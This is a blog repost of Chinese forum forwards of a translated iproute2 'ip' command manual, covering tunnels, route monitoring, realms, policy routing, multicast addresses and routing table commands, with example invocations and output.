只用于GRE通道，计算进入通道数据包的校验和。ocsum表示只计算出去的数据包的校验和；icsum表示只计算进入的数据包的校验和；而csum等于icsum ocsum。 seq,iseq,oseq 只适用于GRE通道，顺序发送／接收数据包。oseq使向外的数据包顺序发送；iseq要求所有进入的数据包都是按照顺序的；而seq等于iseq oseq。示例建立一个点对点通道，最大TTL是32 netadm@amber:~ # ip tunnel add Cisco mode sit remote 192.31.7.104 local 192.203.80.1 ttl 32 11.4.ip tunnel show -- 列出现有的通道缩写：show、list、sh、ls、l参数无输出格式kuznet@amber:~ $ ip tunnel ls CiscoCisco: ipv6/ip remote 192.31.7.104 local 192.203.80.142 ttl 32 kuznet@amber:~ $ 输出的第一部分是通道的设备名，接着是通道模式。下面就是设置通道时的各个参数。统计信息kuznet@amber:~ $ ip -s tunl ls CiscoCisco: ipv6/ip remote 192.31.7.104 local 192.203.80.142 ttl 32 RX: Packets Bytes Errors CsumErrs OutOfSeq Mcasts 12566 1707516 0 0 0 0 TX: Packets Bytes Errors DeadLoop NoRoute NoBufs 13445 1879677 0 0 0 0 kuznet@amber:~ $ 以上输出结果里面的数字和使用ip -s link show的输出是一样的，但是每个标志都是特定于通道的。CsumErrs 对于打开校验和检验的GRE通道，这个数字是由于校验和错误而丢弃的数据包数量。 OutOfSeg 在打开顺序功能的GRE通道内，由于顺序错误而丢弃的数据包数量。 Mcasts 在GRE通道上接收到的多播数据包的数量。 DeadLoop 由于通道是回环到自己而没有传输的数据包数目。 NoRoute 由于到对端没有路由而没有被传输的数据包数目。 NoBufs 由于内核不能分配缓冲区而没有被传输的数据包数目。 12.ip monitor和rtmon -- 状态监视 ip命令可以用于连续地监视设备、地址和路由的状态。这个命令选项的格式有点不同，命令选项的名字叫做monitor，接着是操作对象：ip monitor [ file FILE ] [ all | OBJECT-LIST ] OBJECT-LIST是一些被监控的对象，它可以包括link、address和route。如果没有给出file参数，ip命令就打开RTNETLINK，在上面监听，并把状态的变化输出到标准输出设备。如果使用了file参数，ip命令就不是在RTNETLINK上监听，而是打开由file参数指定的包含RTNETLINK信息的二进制文件，把解析的结果显示出来。这种历史文件可以有工具产生。这个工具具有和ip monitor命令的语法类似的命令行。理想的情况是，在网络配置命令起动之前运行rtmon命令(当然，你可以在任意的时间起动rtmon，它会记录从起动开始的状态变化)。你可以在起动脚本中插入以下命令行：rtmon file /var/log/rtmon.log 如果我们执行如下命令：[root@nixe0n root]ip route add dev eth0 to 61.133.4.7 via 211.99.114.65[root@nixe0n root]ip route del dev eth0 to 61.133.4.7 然后，我们使用ip monitor命令分析/var/log/rtmon.log会得到如下输出结果：[root@nixe0n root]ip monitor file /var/log/rtmon.log rTimestamp: Wed Nov 6 20:25:54 2002 733331 us1: lo: mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:002: eth0: mtu 1500 qdisc pfifo_fast link/ether 00:01:4f:00:15:f1 brd ff:ff:ff:ff:ff:ffTimestamp: Wed Nov 6 20:25:58 2002 33700 us61.133.4.7 via 211.99.114.65 dev eth0 Timestamp: Wed Nov 6 20:25:59 2002 924124 usDeleted 61.133.4.7 via 211.99.114.65 dev eth0 [root@nixe0n root] 13.rtacct -- 路由范围和策略传播在使用OSPF或者BGP协议的路由器上，其路由表可能会很大。如果我们需要对其进行归类或者计算通过每条路由的数据包，就需要保留很多信息。更糟糕的是，如果我们需要区别的不止是数据包的目的地址，还要包括它们的源地址，这个任务就更为复杂了，几乎无法解决。对于这个问题，Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring QoS Policy Propagation via Border Gateway Protocol提出了一个解决方案，就是把策略从路由协议迁移到转发引擎。基本上，通过BGP的Cisco策略迁移(Cisco Policy Propagation via BGP)就是基于此种方式，它使路由器保留所有和转发引擎关系紧密的RIB(Routing Information Base，路由信息库)，以便策略路由规则能够监查所有的路由属性，包括ASPATH的信息和团体(community)字符串。而Linux把这分为由用户空间监控维护的路由信息库(Routing Infomation Base,RIB)，和内核层的转发信息库(Forwarding Infomation Base,FIB)。这是我们的幸运，因为还有另外的解决方案，而这个方案允许更为灵活的策略和更为丰富的语义。换句话说，可以在用户空间根据路由的属性把它们归类，例如：BGP路由的ASPATH、团体(community)；OSPF路由的标记和它们的范围。而管理员手工添加路由时，也知道它们的属性。按照这个标准划分的集合(我们把它们叫做realm)数量就很少了，因此按照路由的源地址和目的地址进行完全的分类就可以管理了。因此，每个路由都可以被分配到一个范围(realm)中。一般这是有路由监控进程作的，不过对于静态路由，也可以使用ip route命令手工处理。在某些情况下（例如路由监控进程不理解realm）为了方便，漏掉的realm可以由路由策略规则补齐。内核使用如下算法计算每个数据包的源范围(realm)和目的范围(realm)：If route has a realm, destination realm of the packet is set to it. If rule has a source realm, source realm of the packet is set to it. If destination realm was not get from route and rule has destination realm, it is also set. If at least one of realms is still unknown, kernel finds reversed route to the source of the packet. If source realm is still unknown, get it from reversed route. If one of realms is still unknown, swap realms of reversed routes and apply step 2 again. 这个过程完成后，我们就知道了数据包的源范围和目的范围。如果某些还是未知，它就会被设置为0(realm unknown) 范围(realm)主要还是由TC(Traffic Control)的路由类别(route classifier)使用，我们可以使用路由类别把数据包分配到给不同的流量类(trafffic class)，为数据包计数，以及为它们制定调度策略。相对于TC，使用realm为进入的数据包计数就简单多了，但这是一个非常有用的应用。内核可以根据realm收集总结数据包统计信息。在用户空间，我们可以使用工具rtacct查看这些信息。例如：kuznet@amber:~ $ rtacct russiaRealm BytesTo PktsTo BytesFrom PktsFrom russia 20576778 169176 47080168 153805 kuznet@amber:~ $ 结果表示，这个路由器收到153805个来自russia地区的数据包，并且向russia转发了169176个数据包。russia范围由ASPATH(路径自治系统)在俄罗斯的路由组成。15.参考T. Narten, E. Nordmark, W. Simpson. ``Neighbor Discovery for IP Version 6 (IPv6)'', RFC-2461. S. Thomson, T. Narten. ``IPv6 Stateless Address Autoconfiguration'', RFC-2462. F. Baker. ``Requirements for IP Version 4 Routers'', RFC-1812. R. T. Braden. ``Requirements for Internet hosts -- communication layers'', RFC-1122. ``Cisco IOS Release 12.0 Network Protocols Command Reference, Part 1'' and ``Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring Policy-Based Routing'', http://www.cisco.com/univercd/cc/td/doc/product/software/ios120.A. N. Kuznetsov. ``Tunnels over IP in Linux-2.2'', 在：ftp://ftp.inr.ac.ru/ip-routing/iproute2-current.tar.gz.A. N. Kuznetsov. ``TC Command Reference'', 在：ftp://ftp.inr.ac.ru/ip-routing/iproute2-current.tar.gz.``Cisco IOS Release 12.0 Quality of Service Solutions Configuration Guide: Configuring QoS Policy Propagation via Border Gateway Protocol'', http://www.cisco.com/univercd/cc/td/doc/product/software/ios120.R. Droms. ``Dynamic Host Configuration Protocol.'', RFC-2131 【责任编辑：nixe0n】 --Contact Information: | [1;5;33m代理[m: 免费安全 ... ***** ******* <[1;4;34mwindtear@ipcn.org[m> | proxy.ipcn.org +86-10-6277**** | 3128 **#*** Tsinghua University | windtear Beijing, 100084 | 密码请访问 CN | [1;4;32mhttp://proxy.ipcn.org[m[m[1;33m※ 来源:·BBS 水木清华站 smth.edu.cn·[FROM: 166.111.48.196][m More...

Posted by windtear at 1:38 AM

4. ip usage 3 - iproute2 - the most powerful tool - [FWD] ip命令手册(三) 我爱网络

发信人: CrazyKid (疯狂小子※爱学习/爱生活), 信区: Linux 标题: [FWD] ip命令手册(三)发信站: BBS 水木清华站 (Wed Nov 6 11:18:06 2002), 站内信件http://linuxaid.com.cn/articles/6/0/608210173.shtmlip命令手册(三)摘要有关路由策略管理和多播地址管理的部分(2002-11-05 10:09:51)--------------------------------------------------------------------------------By nixe0n8.ip route -- 路由策略数据库管理命令8.1.缩写 rule、ru 8.2.对象路由策略数据库的规则用于控制选择路由的算法。 Internet上采用的路由算法一般是基于数据包目的地址的。理论上，也可以由TOS域决定，不过这没有实际应用。要了解经典路由算法的详细情况请参考RFC-1812。而在某些情况下，我们不只是需要通过数据包的目的地址决定路由，可能还需要通过其他一些域：源地址、IP协议、传输层端口甚至数据包的负载。这就叫做：策略路由(policy routing)。注意：策略路由(policy routing)不等于路由策略(rouing policy)。在这种情况下，传统的基于目的地址的路由表就无法满足要求了，需要使用路由策略数据库(routing policy database,RPDB)代替，通过它选择执行某些路由。这些规则可以由很多不同的状态，而且它们没有天生的次序，要由系统管理员决定。RPDB可以匹配以下的域: 数据包的源地址；数据包的目的地址；服务类型(Type of Service)；进入的网络接口；匹配IP协议和传输层端口也是可能的，不过这要依靠iptables或者ipchains通过fwmark为某些数据包做标记，并重定向。每个路由策略由一个选择符(selector)和一个操作(action)组成。系统按照顺序搜索路由策略数据库，把选择符和{源地址、目的地址、进入接口、tos、fwmark}等关键词进行匹配，如果匹配成功，就执行action定义的操作。操作或者成功返回，或者失败并且中止对路由策略。否则，系统继续查询路由策略数据库。操作如何定义？最原始的操作是选择下一跳(nexthop)和输出设备(output device)。Cisco IOS使用这种方式，我们姑且把这叫做匹配并设置(match & set)。而Linux的方式则更为灵活，Linux允许的操作包括：基于目的地址的路由表查询以及按照最长匹配的原则从路由表中选择路由。因此，匹配并设置(match & set)的方式只是一个最简单的特例而已。再系统启动时，内核会为路由策略数据库配置三条缺省的规则：优先级选择符操作解释 0 匹配任何条件查询路由表local(ID 255) 路由表local是一个特殊的路由表，包含对于本地和广播地址的高优先级控制路由。rule 0非常特殊，不能被删除或者覆盖。 32766 匹配任何条件查询路由表main(ID 254) 路由表main(ID 254)是一个通常的表，包含所有的无策略路由。系统管理员可以删除或者使用另外的规则覆盖这条规则。 32767 匹配任何条件查询路由表default(ID 253) 路由表default(ID 253)是一个空表，它是为一些后续处理保留的。对于前面的缺省策略没有匹配到的数据包，系统使用这个策略进行处理。这个规则也可以删除。不要混淆路由表和策略：规则指向路由表，多个规则可以引用一个路由表，而且某些路由表可以没有策略指向它。如果系统管理员删除了指向某个路由表的所有规则，这个表就没有用了，但是仍然存在，直到里面的所有路由都被删除，它才会消失。 8.3.规则类型路由策略规则数据库可以包括如下类型的规则： unicast 返回从被引用的路由表中发现的路由 blackhole 丢弃数据包，不做任何反应 unreachable 产生网络不可达(Network is unreachable)的ICMP错误信息 prohibit 产生通讯被禁止(Communication is administratively prohibited)的ICMP错误信息 nat 把数据报的源地址转换为其它的值。详情请参考附录C 8.4.命令 add、delete、show(或者list) 8.5.ip rule add -- 插入新的规则ip rule delete -- 删除规则缩写：add、a；delete、del、d 参数 type TYPE(default) 这个规则的类型。有效的类型上一节已经介绍过了。 from PREFIX 匹配的源地址 iif NAME 选择数据包进入的设备。如果接口是回环设备，这个规则就只匹配源于本机的数据包。这意味着，你可以为本机发出的数据包和要转发的数据包分别建立路由表，使两者完全隔离。 tos TOS或者dsfield TOS 选择匹配的TOS值 fwmark MARK 选择要匹配的fwmark值 priority PREFERENCE 设置这个规则的优先级。每个规则的优先级都应该明确设置为一个唯一的数值。实际上，由于历史的原因，ip roule add命令无需任何优先级的值，也不必是唯一的。如果用户没有在命令中提供优先级的值，内核会自动选择。如果用户提供的优先级值已经存在，内核也不会拒绝这次请求，而是在相同优先级的规则前面插入新的规则。 table TABLEID 如果规则选择符匹配，就被查询的路由表识别符。 realms FROM/TO 如果规则匹配和路由表查询成功，选择的realms值。 nat ADDRESS 设置要进行网络地址转换的IP地址段。ADDRESS或者是进行网络地址转换ip地址段，或者是一个本机地址，甚至可以是0。警告使用上面两个命令对路由策略数据库进行的任何修改都不会马上生效。只有使用ip route flush cach命令刷新路由缓存之后才会生效。示例通过路由表inr.ruhep路由来自源地址为192.203.80/24的数据包 ip ru add from 192.203.80/24 table inr.ruhep prio 220把源地址为193.233.7.83的数据报的源地址转换为192.203.80.144，并通过表1进行路由 ip ru add from 193.233.7.83 nat 192.203.80.144 table 1 prio 320删除无用的缺省规则 ip ru del prio 32767 8.7.ip rule show -- 列出路由规则缩写：show、list、sh、ls、l 参数好消息，这个命令没有参数。输出格式 kuznet@amber:~ $ ip ru ls0: from all lookup local 200: from 192.203.80.0/24 to 193.233.7.0/24 lookup main210: from 192.203.80.0/24 to 192.203.80.0/24 lookup main220: from 192.203.80.0/24 lookup inr.ruhep realms inr.ruhep/radio-msu300: from 193.233.7.83 to 193.233.7.0/24 lookup main310: from 193.233.7.83 to 192.203.80.0/24 lookup main320: from 193.233.7.83 lookup inr.ruhep map-to 192.203.80.14432766: from all lookup main kuznet@amber:~ $ 每行第一部分的数字是规则的优先级，接着是选择符。关键词lookup后面接着路由表识别符。如果规则要进行网络地址转换，还需要一个关键词map-to设置转换以后的地址。上面的示例非常简单，192.203.80.0/24和193.233.7.0/24组成内部网络，但是它们向外发送数据包要通过不同的路由。主机193.233.7.83和外界会话时，地址需要转换为192.203.80.144。 9.ip maddress -- 多播地址管理9.1.对象这个命令管理的对象是多播地址。 9.2.命令 add、delete、show(或者list) 9.3.ip maddress show -- 列出多播地址缩写：show、list、sh、ls、l 参数 dev NAME(defautl) 设备名输出格式 kuznet@alisa:~ $ ip maddr ls dummy2: dummy link 33:33:00:00:00:01 link 01:00:5e:00:00:01 inet 224.0.0.1 users 2 inet6 ff02::1kuznet@alisa:~ $ 输出的第一行是设备的索引和设备名。后面几行是多播地址，每行由协议识别符开头。关键词link表示这是链路层多播地址。如果一个多播地址有几个用户，那么用户数就在users关键词之后列出。上面的例子没有出现关键词static，它表示这个地址是由ip maddr add命令加入的。 9.4.ip maddress add -- 加入多播地址ip maddress delete -- 删除多播地址缩写：add、a；delete、del、d 简介使用这两个命令，我们可以添加／删除在网络接口上监听的链路层多播地址。这个命令只能管理链路层地址。参数 address LLADDRESS(default) 链路层多播地址 dev NAME 加入／脱离这个多播地址的设备示例让我们继续上一小节的例子 netadm@alisa:~ # ip maddr add 33:33:00:00:00:01 dev dummynetadm@alisa:~ # ip -O maddr ls dummy2: dummy link 33:33:00:00:00:01 users 2 static link 01:00:5e:00:00:01netadm@alisa:~ # ip maddr del 33:33:00:00:00:01 dev dummy 注意：ip命令和内核都不会检查多播地址的有效性。这意味着你可以使用unicast地址代替多播地址。大多数驱动都会忽略unicast地址，但是有些驱动(例如：tulip)会把这个unicast地址加入其过滤器。这样作的效果有些奇怪，如果你使用了别的主机或者路由器的地址作为多播地址，你就可以收到发送到它们的数据包。不过，这并非一个bug，而是内核的一个功能。它可以用于网络监视。【责任编辑：nixe0n】--Contact Information: ***** ******* <windtear@ipcn.org> +86-10-6277**** **#*** Tsinghua University Beijing, 100084 CN[m[1;32m※ 来源:·BBS 水木清华站 smth.edu.cn·[FROM: 166.111.48.196][m More...

Posted by windtear at 1:38 AM

3. ip usage 2 - iproute2 - the most powerful tool - [FWD] ip命令手册(二) 我爱网络

发信人: CrazyKid (疯狂小子※爱学习/爱生活), 信区: Linux 标题: [FWD] ip命令手册(二)发信站: BBS 水木清华站 (Sat Nov 2 16:06:30 2002), 站内信件http://www.linuxaid.com.cn/articles/1/3/130107498.shtmlip命令手册(二)摘要这一部分是关于使用ip命令管理系统路由的内容。(2002-10-31 23:27:51)--------------------------------------------------------------------------------By nixe0n7.路由表管理7.1.缩写 route、ro、r 7.2.对象路由条目保存在内核的路由表中，它们包含寻找到其它网络节点的路径信息。路由表条目都包括一对网络地址/掩码长度以及可选的TOS值等信息。如果数据包目的地址位于属于路由条目的的范围，以及路由的TOS等于0或者等于数据包的TOS，它就匹配路由条目。如果一个数据包匹配多个路由条目，系统内核将按照以下规则决定选择哪个路由：注：作者在文中把地址被子网掩码屏蔽后的部分/掩码长度这种表达方式叫做前缀（prefix）。例如：10/8表示网络10.0.0.0，子网掩码长度是8位；10.1/16表示网络10.1.0.0，子网掩码长度是16位；范围最小的优先匹配，较大的放弃；路由TOS等于数据包TOS的匹配，不等于的放弃；如果经过上面两步的选择，还有数个路由，就选择优先值最高的路由；如果还有数个路由可供选择，就重复进行第一步。为了简化，我们使用{prefix,tos,preference}来标记每个路由。 7.3.路由属性路由条目提供IP数据包投递所需的路由信息、数据(例如：输出设备、下一跳的路由器)和一些可选属性(例如：路径的最大传输单元MTU或者源地址等)。这些属性将在后面的章节详细介绍。 7.4.路由类型路由的设置以及其它的可选属性都依赖于路由类型。最重要的路由类型是unicast路由，这种类型的路由表示到另外主机的真实路由。一般情况下，通常的路由表只有这种类型的路由条目。不过，还存在其它类型的路由，使用的语法也不相同。Linux-2.2理解以下几种类型的路由： unicast 这种类型的路由描述到目的地址的真实路径。 unreachable 这些目的地址是不可达的。如果发过去的数据包都被丢弃并且收到ICMP信息host unreachable，目的地址就会被标记为不可达。在这种情况下，本地发送者将返回EHOSTUNREACH错误。 blackhole 这些目的地址不可达，而且发过去的数据包都被丢弃。在这种情况下，本地发送者将返回EINVAL错误。 prohibit 这些路由是不可达的。发过去的数据包都被丢弃，而且产生ICMP信息communication administratively prohibited 。本地发送者会返回EACCESS错误。 local 目的地址被分配给本机。数据包通过回环被投递到本地。 broadcast 目的地址是广播地址，数据包作为链路广播发送。 throw 和策略规则(policy rule)一块使用的控制路由。如果选择了这种路由，就会认为没有发现路由，在这个表中的查询就会被终止。没有找到策略路由就相当于在路由表中没有找到路由，数据包会被丢弃，并产生ICMP信息net unreachable。本地发送者会返回ENETUNREACH错误。 nat 特定的NAT路由。目标地址属于哑地址（或者称为外部地址），在转发前需要进行地址转换。 anycast 目标是anycast地址，被分配给本机。这类地址和本地地址大同小异，不同的是这类地址不能用于任何数据包的源地址。 multicast 使用多播路由。在普通的路由表中，这种路由并不存在。 7.5.路由表从Linux-2.2开始，内核把路由归纳到许多路由表中，这些表都进行了编号，编号数字的范围是1到255。另外，为了方便，还可以在/etc/iproute2/rt_tables中为路由表命名。默认情况下，所有的路由都会被插入到表main(编号254)中。在进行路由查询时，内核只使用路由表main。实际上，还有另外一个路由表也一直存在，这个表是不可见的，而且极为重要。这就是表local。这个表保存本地和广播路由。内核会自动维护这个路由表，通常系统管理员没有必要对它进行修改，甚至不必看到。在使用策略路由（policy routing）时，我们将使用多个路由。在这种情况下，表识别符有很多参数，因此需要使用{prefix,tos,preference}的形式唯一地识别每个路由。 7.6.ip route add -- 添加新路由ip route change -- 修改路由ip route replace -- 替换已有的路由缩写：add、a；change、chg；replace、repl 参数 to PREFIX或者to TYPE PREFIX(default) 路由的目标前缀(prefix)。如果TYPE被忽略，ip命令就会使用默认的类型unicast。其它的类型在上一节都有介绍。PREFIX是一个IP或者IPv6地址，也可以跟着一个斜杠和掩码长度。如果没有掩码长度，ip命令就假定是一个单一ip地址。另外，还有一个特殊的PREFIX--default（缺省路由），它等于IPv4的0/0，或者IPv6的::/0。 tos TOS 或者defield TOS 定义服务类型关键词。在进行路由匹配时，内核首先比较数据包的TOS和route的TOS，如果没有和数据包TOS相同的路由，还可以选择TOS等于0的路由。TOS或者是一个十六进制的数字，或者是一个由/etc/iproute2/rt_dsfield文件定义的识别符。 metric NUMBER或者preference NUMBER 定义路由的优先值，NUMBER时一个任意的32位数字。 table TABLEID 路由要加入的表。TABLEID或者是一个数字或者是/etc/iproute2/rt_tables文件定义的一个字符串。如果没有这个参数，ip命令就会把路由加入到表main中，本地(local)、广播(broadcast)和网络地址转换(nat)路由除外。在默认情况下，这些类型的路由都会被加入表local中。 dev NAME 输出设备的名字 via ADDRESS 指定下一跳路由器的地址。实际上，这个域的可靠性取决于路由类型。对于通常的unicast路由，它或者是真正的下一跳路由器地址，或者如果它是BSD兼容模式安装的直接路由，它可以是一个网络接口的本地地址。对于NAT路由，它是转换后的地址。 src ADDRESS 在向目的prefix发送数据包时选择的源地址。 realm REALMID 指定路由分配的realm。REALM可以是一个数字或者/etc/iproute2/rt_realms文件定义的一个字符串。有关realm更为详细的信息请看附录（Route realms and policy propagation, rtacct）。 mtu MTU或者mtu lock MTU 设置到达目的路径的最大传输单元(MTU)。如果没有使用修饰符lock，内核会通过路径最大传输单元发现（Path MTU Discovery）机制更新MTU；如果使用了修饰符lock，内核就不会测试路径的最大传输单元。在这种情况下，发出的所有IPv4数据包DF域都会被设置为0（允许分片），对于IPv6数据包也允许分片。 window NUMBER 设置到目的地址TCP连接的最大窗口值，以字节为单位。使用这个参数可以限制对端发送数据的速率。 rtt NUMBER 估算初始往返时间（Round Trip Time） rttvar NUMBER 估算初始往返时间偏差(RTT variance) ssthresh NUMBER 估算慢启动阀值(slow start threshould) cwnd NUMBER 把拥挤窗口(congestion window)值锁定为NUMBER。如果没有lock标记，这个值会被忽略。 advmss NUMBER 设置在建立TCP连接时，向目的地址声明的最大报文段大小(Maximal Segment Size,MSS)。如果没有设置，Linux内核会使用计算第一跳的最大传输单元得到的数值。 nexthop NEXTHOP 设置多路径路由的下一跳地址。NEXTHOP比较复杂，它的语法和以下高层参数类似：via ADDRESS--表示下一跳路由器；dev NAME--表示输出设备；weight NUMBER--在多路由路径中，这个元素的权重。表示相对带宽或者服务质量。 scope SCOPE_VAL 路由前缀(prefix)覆盖的范围。SCOPE_VAL可以是一个数字，也可以是/etc/iproute2/rt_scope文件定义的一个字符串。如果没有这个参数，ip命令就会根据具体情况猜测：对于经过网关的unicast路由，就设置为global；对于直连的unicast路由和广播路由，就设置为link；对于本地路由，就设置为host。 protocol RTPROTO 本条路由得路由协议识别符。RTPROTO可以是一个数字，也可以是/etc/iproute2/rt_protos文件定义的一个字符串。如果使用时没有提供这个参数，ip命令就使用默认值boot(也就是说，ip命令认为添加路由的人不知道自己做了些什么)。有些协议值有其固定的解释：redirect--路由是由ICMP重定向加入的；kernel--路由是由内核在自动配置期间加入的；boot--路由是启动过程中加入的。如果一个路由监控程序将要启动，这些路由都会被清除；static--为了覆盖动态路由，由系统管理员手工添加的路由。路由监控程序也会优先考虑这类路由，甚至可能通告给其对端；ra--路由是通过路由发现协议加入的(Router Discovery Protocol)。其它的值没有保留，系统管理员可以自由分配(或者不分配)给协议标记。至少，路由监控程序应该注意对一些唯一协议值的设置，这些协议值在rtnetlink.h文件或者rt_protos数据库中分配。 onlink 假装和下一跳路由器是直接相连的，即使它没有匹配任何接口前缀(prefix)。 equalize 允许把数据包随机从多个路由发出。如果没有这个路由修饰符，内核就会冻结下一跳路由的地址。示例设置到网络10.0.0/24的路由经过网关193.233.7.65 ip route add 10.0.0/24 via 193.233.7.65修改到网络10.0.0/24的直接路由，使其经过设备dummy ip route chg 10.0.0/24 dev dummy加入缺省多路径路由，让ppp0和ppp1分担负载(注意：scope值并非必需，它只不过是告诉内核，这个路由要经过网关而不是直连的。实际上，如果你知道远程端点的地址，使用via参数来设置就更好了)。 ip route add default scope global nexthop dev ppp0 nexthop dev ppp1设置NAT路由。在转发来自192.203.80.144的数据包之前，先进行网络地址转换，把这个地址转换为193.233.7.83（回来的转换将会在后面的章节路由策略中介绍）。 ip route add nat 192.203.80.142 via 193.233.7.83 7.7.ip route delete-- 删除路由缩写：delete、del、d 参数 ip route del使用和ip route add相同的参数，不过语法稍有不同。这个命令使用关键词（to、tos、preference和table）选择要删除的路由。如果命令中使用了可选属性，ip命令会校验这个属性和要删除的路由是否一致；如果没有给定关键词或者属性不一致，ip route del会执行失败。示例删除上一节命令加入的多路径路由 ip route del default scope global nexthop dev ppp0 nexthop dev ppp1 7.8.ip route show -- 列出路由缩写：show、list、sh、ls、l 简介使用这个命令，你可以看到路由表的内容，或者查询符合某些条件的路由。参数 to SELECTOR(default) 只选择到给定地址的路由。 SELECTOR由修饰符(root、match、exact，可选)和一个前缀(prefix)组成。root PREFIX表示选择前缀(prefix)不短于PREFIX的路由，例如：root 0/0将选在路由表里面的全部路由；match PREFIX表示选择前缀(prefix)不长于PREFIX的路由，match 10.1/16会选择前缀(prefix)是10.1/16、10./8和0/0的全部路由；而exact PREFIX(或者just PREFIX)表示精确匹配。如果没有这些选项(ip route ls)，ip命令就假定是ip route ls to root 0/0，将列出系统的所有路由。 tos TOS或者dsfield TOS 只列出tos等于TOS的路由 table TABLEID 列出路由表TABLEID里面的路由。缺省设置是table main。TABLEID或者是一个真正的路由表ID或者是/etc/iproute2/rt_tables文件定义的字符串，或者是以下的特殊值：all -- 列出所有表的路由；cache -- 列出路由缓存的内容。 cloned或者cached 列出被克隆出来的路由（由于某些路由属性改变，例如：MTU，而由某些路由派生出来的路由）。实际上，它的内容和表缓存的内容是一样的。 from SELECTOR 和to的语法是相同的，只不过由目的地址换为源地址而已。注意：这个选项之适用于被克隆出来的路由。 protocol RTPROTO 只列出协议是RTPROTO的路由 scope SCOPE_VAL 只列出范围是SCOPE_VAL的路由 type TYPE 只列出类型为TYPE的路由 dev NAME 只列出通过设备NAME的路由 via PREFIX 只列出下一跳通过PREFIX的路由 src PREFIX 只列出源地址属于PREFIX的路由 realm REALMID或者raalm FROMREALM/TOREALM 只列出realm为REALMID的路由示例计算使用gated/bgp协议的路由个数 kuznet@amber:~ $ ip route ls proto gated/bgp |wc 1413 9891 79010kuznet@amber:~ $计算路由缓存里面的条数，由于被缓存路由的属性可能大于一行，以此需要使用-o选项 uznet@amber:~ $ ip -o route ls cloned |wc 159 2543 18707kuznet@amber:~ $ 输出格式通常，在这个命令输出的信息中，每个路由纪录占一行。不过，有时某些纪录可能会超过一行，例如被克隆出来的路由或者包含一些额外的信息。如果在命令中使用了-o选项，在每个纪录中，会使用代替回车作为回行标记。例如： kuznet@amber:~ $ ip ro ls 193.233.7/24193.233.7.0/24 dev eth0 proto gated/conn scope link src 193.233.7.65 realms inr.ac kuznet@amber:~ $ 如果是列出被克隆的条目，输出信息将是另外的形式。例如： kuznet@amber:~ $ ip ro ls 193.233.7.82 tab cache193.233.7.82 from 193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac/inr.ac cache <src-direct,redirect> mtu 1500 rtt 300 iif eth0193.233.7.82 dev eth0 src 193.233.7.65 realms inr.ac cache mtu 1500 rtt 300kuznet@amber:~ $ 输出信息的第二行是以关键词cache开头的，显示路由的其它缓存标记和属性。本行的第一个域是cache <缓存标记>，缓存标记包括： local 数据包被投递到本地。它适用于本地回环单向传播(unicast)路由，如果这个主机是对应广播组的一个成员，它也适用于广播路由何多播路由。 reject 路径无效。任何试图通过这个路由的企图都会导致错误。 mc 目的是多播地址(multicast)。 brd 目的是广播地址(broadcast)。 src-direct 源地址是在一个直接连接的接口。 redirected 路由是由ICMP重定向建立的。 redirect 数据包通过这个路由将触发ICMP重定向。 fastroute 路由适合用于快速路由(fastroute)。 equalize 使数据包随机地通过这个路由。 dst-nat 目的地址需要进行地址转换。 src-nat 源地址需要进行地址转换。 masq 源地址需要伪装(masquerading)。 notify 修改/删除这个路由将触发RTNETLINK报警。接着是一些路由属性，支持的属性如下： error 对于reject路由，这是返回给本地发送者的错误码。这些错误码也会被转换为ICMP错误码，发送给远程发送者。 expires 到了超时时间，这个条目就会消失。 iif 需要这个路由的数据包如期到达这接口。统计选项如果在命令中使用-statistics选项，ip命令会给出一些更为详尽的信息： users 使用这个路由的用户数。 age 显示这个路由最后使用时的时间。 used 自从建立这个路由以来，它被查询的次数。 7.9.ip route flush -- 擦除路由表缩写：flush、f 简介使用这个命令，可以很方便地删除符合某些条件的路由。参数这个命令的参数和ip route show命令的参数相同，只不过被操作的路由表不会被显示出来。它和ip route show命令唯一的区别是它们的缺省操作，ip route show会显示出路由表main的所有条目，而ip route flush只会给出帮助信息，不对路由表进行任何操作。至于这个区别的原因，恐怕不必多做解释了吧？统计选项如果在这个命令中使用了-statistics选项，它就会显示一些冗余信息。这些信息包括：被删除的路由数和删除过程中遍历路由表的次数。如果这个选项使用了两次，ip还会输出被删除路由的详细信息。示例第一个例子是删除路由表main中的所有网关路由（例如：在路由监控程序挂掉之后）： netadm@amber:~ # ip -4 ro flush scope global type unicast 第二个例子是清除所有被克隆出来的IPv6路由： netadm@amber:~ # ip -6 -s -s ro flush cache3ffe:2400::220:afff:fef4:c5d1 via 3ffe:2400::220:afff:fef4:c5d1 dev eth0 metric 0 cache used 2 age 12sec mtu 1500 rtt 3003ffe:2400::280:adff:feb7:8034 via 3ffe:2400::280:adff:feb7:8034 dev eth0 metric 0 cache used 2 age 15sec mtu 1500 rtt 3003ffe:2400::280:c8ff:fe59:5bcc via 3ffe:2400::280:c8ff:fe59:5bcc dev eth0 metric 0 cache users 1 used 1 age 23sec mtu 1500 rtt 3003ffe:2400:0:1:2a0:ccff:fe66:1878 via 3ffe:2400:0:1:2a0:ccff:fe66:1878 dev eth1 metric 0 cache used 2 age 20sec mtu 1500 rtt 3003ffe:2400:0:1:a00:20ff:fe71:fb30 via 3ffe:2400:0:1:a00:20ff:fe71:fb30 dev eth1 metric 0 cache used 2 age 33sec mtu 1500 rtt 300ff02::1 via ff02::1 dev eth1 metric 0 cache users 1 used 1 age 45sec mtu 1500 rtt 300*** Round 1, deleting 6 entries ****** Flush is complete after 1 round ***netadm@amber:~ # ip -6 -s -s ro flush cacheNothing to flush.netadm@amber:~ # 第三个例子是在gated程序挂掉之后，清除所有的BGP路由： netadm@amber:~ # ip ro ls proto gated/bgp |wc 1408 9856 78730netadm@amber:~ # ip -s ro f proto gated/bgp*** Round 1, deleting 1408 entries ****** Flush is complete after 1 round ***netadm@amber:~ # ip ro f proto gated/bgpNothing to flush.netadm@amber:~ # ip ro ls proto gated/bgpnetadm@amber:~ # 7.10.ip route get -- 获得单个路由缩写：get、g 简介使用这个命令可以获得到达目的地址的一个路由以及它的确切内容。参数 to ADDRESS(default) 目标地址 from ADDRESS 源地址 tos TOS或者dsfield TOS 服务类型 iif NAME 数据包进来的设备 oif NAME 数据包出去的设备 connected ip route get命令至少要有参数to ADDRESS。使用connected参数，如果没有给出源地址(from ADDRESS)，ip就会重新在路由表中查询能够到达目的地址的源地址，给出获得的第一个源地址到目的地址的路由。如果使用了策略路由，会有所不同。 ip route get命令和ip route show命令执行的操作是不同的。ip route show命令只是显示现有的路由，而ip route 